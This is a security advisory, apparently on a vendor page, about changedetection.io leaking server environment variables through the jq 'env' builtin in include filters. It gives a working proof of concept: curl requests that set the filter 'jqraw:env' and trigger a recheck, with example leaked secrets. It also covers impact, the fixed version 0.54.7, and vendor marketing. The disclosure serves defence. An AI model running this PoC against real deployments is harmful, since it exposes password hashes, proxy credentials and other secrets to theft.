GHSA-58r7-4wr5-hfx8
Changedetection.io Discloses Environment Variables via jq env Builtin in Include Filters
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
changedetection-ioReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.
Details
Vulnerable file: changedetectionio/html_tools.py, lines 380-388
User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:
if json_filter.startswith("jq:"):
jq_expression = jq.compile(json_filter.removeprefix("jq:"))
match = jq_expression.input(json_data).all()
return _get_stripped_text_from_json_match(match)
if json_filter.startswith("jqraw:"):
jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
match = jq_expression.input(json_data).all()
return '\n'.join(str(item) for item in match)
The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)) — it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.
PoC
Step 1 — Create a watch for any JSON endpoint with jqraw:env as the include filter:
curl -X POST http://target:5000/api/v1/watch \
-H "Content-Type: application/json" \
-H "x-api-key: <api-key>" \
-d '{
"url": "https://httpbin.org/json",
"include_filters": ["jqraw:env"],
"time_between_check": {"seconds": 30}
}'
If no password or API key is set (the default), no authentication is needed.
Step 2 — Wait for the watch to be checked, or trigger a recheck:
curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"
Step 3 — The processed text file on disk now contains all environment variables:
{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
... and all other env vars}
The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.
Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.
Impact
- Secret exposure: Leaks
SALTED_PASS(password hash used for authentication), enabling offline cracking or direct session forgery - Infrastructure credential theft: Leaks
PLAYWRIGHT_DRIVER_URL,WEBDRIVER_URL,HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variables - Cascading access: Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems
- Affects all deployments using jq: Any instance where the Python
jqmodule is installed (standard in Docker deployments) is vulnerable - No authentication required by default: changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | changedetection-io | all versions | 0.54.7 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for changedetection-io. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update changedetection-io to 0.54.7 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-58r7-4wr5-hfx8 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-58r7-4wr5-hfx8 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-58r7-4wr5-hfx8. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-58r7-4wr5-hfx8 in your dependencies?
O3 detects GHSA-58r7-4wr5-hfx8 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.